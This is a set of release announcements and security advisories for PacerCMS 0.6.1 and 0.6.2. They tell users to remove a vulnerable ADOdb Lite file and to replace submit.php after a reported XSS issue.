PacerCMS

A vulnerability in the ADOdb Lite package that PacerCMS uses to interact with the database has been discovered that could potentially allow an attacker to execute PHP on your system. Please remove the following file from your install, as its functionality is of limited use to the software at this time.

./includes/adodb_lite/adodb-perf-module.inc.php

In order for the attacker to exploit your system register_globals would have to be enabled on your PHP installation with your Web host. Most modern hosts have this feature disabled by default, but some (including GoDaddy) leave it enabled for backwards compatibility. Further reading:

http://php.net/register_globals

Again, please take a moment to remove the specified file from your installations even if you do not have register_globals enabled. The problem has been reported to the developer of ADOdb Lite, but a patched version is not yet available.

Running an online newspaper or magazine may bring some unwelcome attention from those seeking to exploit vulnerabilities in PacerCMS. We have received a great deal more traffic as of late as a result of our previous vulnerability and a few other minor examples that would effect a very small percentage of Web hosts. With that in mind, realize that your site is always in the crosshairs of an attacker because he or she can draw a great deal of attention by defacing or disabling your Web site. If you come across a site outlining a vulnerability in the software, please let us know (through direct e-mail) so that we may act quickly.

There is an issue with 0.6.1 that may cause a minor nuisance when adding or updating items in the database on some hosts. If you recently upgraded, here are the files you need to bring your install current.

• includes/cm-header.php
• siteadmin/article-browse.php
• siteadmin/article-edit.php
• siteadmin/article-media.php
• siteadmin/cm-includes/cm-header.php
• siteadmin/issue-browse.php
• siteadmin/issue-edit.php
• siteadmin/page-edit.php
• siteadmin/poll-edit.php
• siteadmin/profile.php
• siteadmin/section-edit.php
• siteadmin/settings.php
• siteadmin/staff-access.php
• siteadmin/staff-edit.php
• siteadmin/submitted-browse.php
• siteadmin/submitted-edit.php

This Release (Subversion R104):

• Fixes an evaluation error on many hosts
• Plugs a minor file include risk if configuration file is missing

Download PacerCMS 0.6.2

We are proud to announce the next release of PacerCMS, 0.6.1. This release is aimed at developers looking to extend the back-end Site Administrator panel by better documentation of the functions and processes that go into publishing stories, managing users and sections. We have also cut down the number of database queries required to do routine tasks through better session management.

While this version does not add any significant features for the average user other than a few bug fixes, it is recommended for all users. Our friends at RawSecurity.org have outlined a few problems that would allow a malicious visitor to conceivably obtain access rights through cross-site scripting (XSS) in the content submission public module (./submit.php). Even if you are not able to process a full update right now, please do replace your existing submit.php file with the version found on our subversion repositories. While we cannot guarantee that a site running PacerCMS will be safe from people with malicious intent, we do take security issues seriously.

This Release (R101)

• Streamlined code base in Site Administrator
• Adoption of phpDoc.org code commenting
• Security release
• Various bug fixes and minor enhancements from the Developer’s List

Download PacerCMS 0.6.1